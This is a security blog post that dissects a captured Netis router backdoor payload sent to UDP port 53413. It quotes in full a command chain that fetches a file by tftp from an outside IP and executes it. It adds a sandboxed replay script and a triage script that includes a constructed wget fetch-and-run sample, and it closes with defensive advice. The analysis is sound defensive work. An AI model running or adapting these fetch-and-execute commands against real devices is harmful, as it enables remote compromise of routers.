Friday, August 5, 2016

Netis Router Backdoor UDP 53413

I saw this SANS Internet Storm Center post about Netis Router Backdoor exploit attempts. Thought it'd be interesting to take a quick look at one of them. It's a raw UDP packet sent to port 53413 with a shell command to be executed. Looks very similar to all those Shellshock attempts you continue to see in your logs.

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

So first ...

cd /tmp || cd /var/ || cd /dev/;

The first thing the attacker tries is to move into a directory where he is likely to have write permission. The double pipe (||) means the second command only runs if the first fails, and the third only if the second fails too: an if-this-works-stop, otherwise-try-the-next chain. So he tries /tmp, then /var, then /dev, which on embedded devices are usually writable (often RAM-backed) filesystems. Note that this chain is joined to the rest of the line with ';' rather than '&&', so even if all three cd commands fail the remaining commands still run from whatever the current directory happened to be. Once one of the cd commands succeeds, he's ready to execute the more interesting commands from that directory.

Then

busybox tftp -r min -g 91.134.141.49;

Next the attacker uses busybox, a single binary found on many embedded Linux devices (including the Netis routers this exploit targets) that bundles many basic Linux commands and utilities, tftp among them.

tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:

   -r FILE Remote FILE
   -g Get file


So the attacker is using the tftp command to get a remote file called 'min', in this case from the server at 91.134.141.49, and save it to the current directory under the same name (no -l local name was given). Again that directory could be /tmp, /var, or /dev depending on which cd succeeded. TFTP runs over UDP port 69 and needs no credentials, which is why these droppers favor it on devices that may not ship wget or curl.

Then

cp /bin/sh .;

Next the attacker copies the real shell binary, /bin/sh, into the current directory, producing a file named sh (again this could be in /tmp, /var, or /dev depending on which cd succeeded).

Then

cat min >sh;

This is not an append. A single '>' truncates the target before writing, so the copy of /bin/sh made a moment earlier is thrown away and the file named sh now contains only the bytes of the downloaded 'min'. The cp step mostly just guarantees a file called sh exists; the net effect is that the attacker's own payload is sitting there under an innocuous name. (Appending would have been '>>', and even then the result would not run "both" programs: the kernel loads an executable from its header, so whatever is glued onto the end of a binary is simply ignored.)

Then

chmod 777 sh;

Then sh is made readable, writable, and executable by everyone (mode 777), so the attacker can run it regardless of the mode the download or the copy ended up with.

Then

./sh.

Finally the attacker executes ./sh, which at this point is the downloaded payload rather than a shell, and it runs with whatever privileges the backdoor service has; the router is now compromised. (The trailing period after ./sh in the capture above is most likely the end of the sentence rather than part of the command.)
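To see exactly what each of those steps leaves on disk, here is an added example (mine, not from the original post or the ISC diary) that replays the staging sequence inside a throwaway directory. It assumes a few things that are not in the original: the attacker's tftp server is replaced by a local file, the "min" payload is a constructed one-line script that only prints a string, and the sandbox has no tmp directory so the first cd fails and the || chain falls through to var.

```shell
#!/bin/sh
# Added example: replays the dropper's file-staging steps in a scratch
# directory so the effect of each command can be inspected safely.
# Assumptions (mine, not from the original post): the tftp download is
# replaced by a local copy, and "min" is a constructed harmless script.

# Same fallback chain as the payload. Runs in a subshell so the caller's
# working directory is unaffected; prints the directory that won.
pick_dir() (
    root=$1
    cd "$root/tmp" 2>/dev/null || cd "$root/var" 2>/dev/null || cd "$root/dev" 2>/dev/null || return 1
    pwd
)

# Stages the payload the way the command chain does, with the tftp
# download replaced by a local copy. Prints the staging directory.
stage_dropper() (
    root=$1
    min_src=$2
    dir=$(pick_dir "$root") || return 1
    cd "$dir" || return 1
    cp "$min_src" ./min        # stands in for: busybox tftp -r min -g 91.134.141.49
    cp /bin/sh .               # a file named sh, at this moment the real shell binary
    cat min > sh               # '>' truncates: sh now holds min's bytes, not /bin/sh
    chmod 777 sh
    pwd
)

# Builds the sandbox: no tmp directory at all, so the first cd fails and
# the chain falls through to var. Prints the sandbox root.
make_sandbox() {
    root=$(mktemp -d)
    mkdir "$root/var" "$root/dev"
    # constructed stand-in for the file the attacker serves as "min"
    printf '#!/bin/sh\necho constructed payload\n' > "$root/min_from_attacker"
    printf '%s\n' "$root"
}

# Exit 0 when the staged sh is byte-identical to the downloaded file and
# is no longer a copy of /bin/sh.
staged_is_payload() {
    dir=$1
    root=$2
    cmp -s "$dir/sh" "$root/min_from_attacker" && ! cmp -s "$dir/sh" /bin/sh
}

# Stand-alone demo: stage, show what is on disk, then run the staged file.
root=$(make_sandbox)
dir=$(stage_dropper "$root" "$root/min_from_attacker")
echo "staged in: $dir"
ls -l "$dir"
echo "contents of ./sh:"
cat "$dir/sh"
echo "running ./sh:"
(cd "$dir" && ./sh) || echo "(exec not permitted on this mount; contents shown above)"
rm -rf "$root"
```

Running it shows the staged sh is byte-for-byte the constructed "min" file, and that ./sh prints the payload's string rather than starting a shell. That is the whole point of the cp-then-overwrite dance: a file with a boring name that is really the download.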

To prevent this: I'm not sure that I've seen anything about Netis actually patching it, so you probably need some sort of IPS (Intrusion Prevention System) with a signature that can block this type of traffic. Two cheaper checks are also worth doing. First, make sure UDP 53413 on the router's WAN side is not reachable from the Internet (an upstream firewall rule, or a quick scan from outside). Second, watch for outbound TFTP (UDP 69) from the router, since that is the download step of the chain above. Because the port is the backdoor's own listener rather than a legitimate service, a signature can be as coarse as UDP/53413 traffic carrying strings like 'busybox tftp' or 'cd /tmp || cd /var/'.
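If you are pulling these payloads out of packet captures or honeypot logs, the following added example (mine, not from the original post) does the triage the walk-through above did by hand: it splits a command chain into its ';'-separated steps, labels each one, and extracts the download host and file name so they can be blocked or hunted for. The second sample payload is constructed (a wget-style chain using the documentation address 198.51.100.7), not a real capture; the first is the chain from the post.

```shell
#!/bin/sh
# Added example: a small triage helper for command chains seen on UDP/53413.
# The tftp chain is the one from the post; the wget chain and the benign
# line are constructed samples.

# One line per ';'-separated step, with a coarse label.
classify_steps() {
    printf '%s\n' "$1" | tr ';' '\n' | while IFS= read -r step; do
        case $step in
            '')                   ;;                          # trailing ';' gives an empty step
            cd*)                  echo "cwd   : $step" ;;
            *tftp*|*wget*|*curl*) echo "fetch : $step" ;;
            chmod*)               echo "perms : $step" ;;
            ./*|'sh '*)           echo "exec  : $step" ;;
            *)                    echo "other : $step" ;;
        esac
    done
}

# The step that downloads the payload (first one mentioning a fetch tool).
fetch_step() {
    printf '%s\n' "$1" | tr ';' '\n' | grep -E -m1 'tftp|wget|curl'
}

# IPv4 address the payload is fetched from (empty if a hostname was used).
download_host() {
    fetch_step "$1" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | head -n1
}

# Name the payload is fetched as: tftp's -r argument or the URL basename.
download_file() {
    fetch_step "$1" | grep -oE -e '-r[[:space:]]+[^[:space:]]+' -e 'https?://[^[:space:]]+' \
        | head -n1 | sed -E 's#.*[/[:space:]]##'
}

# Exit 0 when the chain both fetches a file and executes something afterwards.
is_dropper() {
    fetch_step "$1" >/dev/null && classify_steps "$1" | grep -q '^exec'
}

# First line is the chain from the post; the other two are constructed.
SAMPLES='cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh
cd /tmp;wget http://198.51.100.7/x.sh -O x.sh;chmod +x x.sh;./x.sh
cd /var/log;ls'

printf '%s\n' "$SAMPLES" | while IFS= read -r payload; do
    if is_dropper "$payload"; then
        echo "DROPPER host=$(download_host "$payload") file=$(download_file "$payload")"
        classify_steps "$payload"
    else
        echo "no fetch-and-execute pattern: $payload"
    fi
done
```

The host and file name are the two indicators you would feed to a firewall or a threat-intel lookup; the step labels are what you would match on in a signature, since the fetch-then-chmod-then-exec shape survives even when the attacker rotates the IP and file name.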


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1 comment:

  1. Good article! You really are an expert. It's hard to find a budget and good laser flashlight now. I found a Gearbest router, it's good quality. What do you think?